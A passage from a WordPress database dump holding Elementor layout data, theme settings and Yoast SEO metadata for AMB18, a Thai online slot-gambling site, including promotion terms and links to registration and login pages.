\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07\\u00a0<\\/strong><b>AMB18\\u00a0<\\/b>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><span data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>AMB18 \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/b><\\/span>\\u00a0\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3092,408,'_thumbnail_id','347'),(3095,27,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:9;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:7;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:9;}}s:5:\"style\";a:2:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:6;s:16:\"background_color\";i:6;}s:14:\"section_border\";a:2:{s:13:\"border_border\";i:6;s:13:\"border_radius\";i:6;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:6;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:6;s:10:\"image_size\";i:6;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:1:{s:5:\"align\";i:6;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:5:{s:4:\"text\";i:6;s:13:\"selected_icon\";i:6;s:10:\"icon_align\";i:6;s:11:\"icon_indent\";i:6;s:4:\"link\";i:6;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:5:\"align\";i:6;s:28:\"text_shadow_text_shadow_type\";i:6;s:23:\"text_shadow_text_shadow\";i:6;s:33:\"button_box_shadow_box_shadow_type\";i:6;s:28:\"button_box_shadow_box_shadow\";i:6;s:13:\"border_radius\";i:6;}}}}}'),(3098,409,'_elementor_edit_mode','builder'),(3099,409,'_elementor_template_type','kit'),(3100,409,'_wp_page_template','default'),(3101,409,'_elementor_page_settings','a:56:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#2BC70E\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#2BC70E\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#2BC70E\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:5:\"AMB18\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:84:\"AMB18 สล็อต แตก ง่าย ทุน น้อย วอ เลท\";s:9:\"site_logo\";a:5:{s:3:\"url\";s:73:\"https://amb18b.com/wp-content/uploads/2025/10/Megabet_333_Biz_-_Logo.webp\";s:2:\"id\";i:48;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),(3102,409,'_elementor_data','[]'),(3103,409,'_elementor_version','3.35.5'),(3104,409,'_elementor_pro_version','3.32.3'),(3114,410,'_elementor_source','post'),(3115,410,'_elementor_edit_mode','builder'),(3116,410,'_elementor_template_type','header'),(3117,410,'_elementor_version','3.35.5'),(3118,410,'_elementor_pro_version','3.32.3'),(3119,410,'_wp_page_template','default'),(3120,410,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#99CC00\",\"background_color_b\":\"#FFEF2A\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"align_items\":\"center\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3121,410,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(3131,411,'_elementor_edit_mode','builder'),(3132,411,'_elementor_template_type','kit'),(3133,411,'_wp_page_template','default'),(3134,411,'_elementor_page_settings','a:56:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#99CC00\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#99CC00\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#99CC00\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:5:\"AMB18\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:84:\"AMB18 สล็อต แตก ง่าย ทุน น้อย วอ เลท\";s:9:\"site_logo\";a:5:{s:3:\"url\";s:73:\"https://amb18b.com/wp-content/uploads/2025/10/Megabet_333_Biz_-_Logo.webp\";s:2:\"id\";i:48;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),(3135,411,'_elementor_data','[]'),(3136,411,'_elementor_version','3.35.5'),(3137,411,'_elementor_pro_version','3.32.3'),(3156,412,'_edit_lock','1772440251:3'),(3157,369,'_wp_attachment_image_alt','สล็อต เว็บ ตรง แตก หนัก 2025'),(3158,412,'_thumbnail_id','369'),(3159,412,'_edit_last','3'),(3160,412,'_yoast_wpseo_primary_category','6'),(3161,412,'_yoast_wpseo_focuskw','สล็อต เว็บ ตรง แตก หนัก 2025'),(3162,412,'_yoast_wpseo_title','AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 เล่นง่าย แตกจริง แจกหนัก'),(3163,412,'_yoast_wpseo_metadesc','สล็อต เว็บ ตรง แตก หนัก 2025 เว็บเกมคุณภาพระบบไว เกมแตกจริงอัปเดตใหม่กว่า 1,500 รายการ พร้อมฟีเจอร์ซื้อฟรีสปินและค่ายเกมดังครบทุกสไตล์'),(3164,412,'_yoast_wpseo_linkdex','80'),(3165,412,'_yoast_wpseo_content_score','90'),(3166,412,'_yoast_wpseo_estimated-reading-time-minutes','2'),(3167,414,'_edit_lock','1772440246:3'),(3168,370,'_wp_attachment_image_alt','สล็อต เว็บ ตรง แตก ง่าย ล่าสุด'),(3169,414,'_thumbnail_id','370'),(3170,414,'_edit_last','3'),(3171,414,'_yoast_wpseo_primary_category','6'),(3172,414,'_yoast_wpseo_focuskw','สล็อต เว็บ ตรง แตก ง่าย ล่าสุด'),(3173,414,'_yoast_wpseo_title','AMB18 สล็อต เว็บ ตรง แตก ง่าย ล่าสุด เว็บดี โบนัสแตก เล่นสบาย'),(3174,414,'_yoast_wpseo_metadesc','สล็อต เว็บ ตรง แตก ง่าย ล่าสุด เว็บดีมีคุณภาพรวมเกมดังระดับโลก โบนัสแตก เล่นสบาย ระบบลื่น จ่ายจริงทุกยอดถอน อัปเดตใหม่ปีนี้'),(3175,414,'_yoast_wpseo_linkdex','80'),(3176,414,'_yoast_wpseo_content_score','90'),(3177,414,'_yoast_wpseo_estimated-reading-time-minutes','2'),(3180,363,'_wp_attachment_image_alt','AMB18'),(3181,416,'_thumbnail_id','371'),(3182,416,'_elementor_edit_mode','builder'),(3183,416,'_elementor_template_type','wp-page'),(3184,416,'_elementor_version','3.35.5'),(3185,416,'_elementor_pro_version','3.32.3'),(3186,416,'_wp_page_template','default'),(3187,416,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3188,416,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> 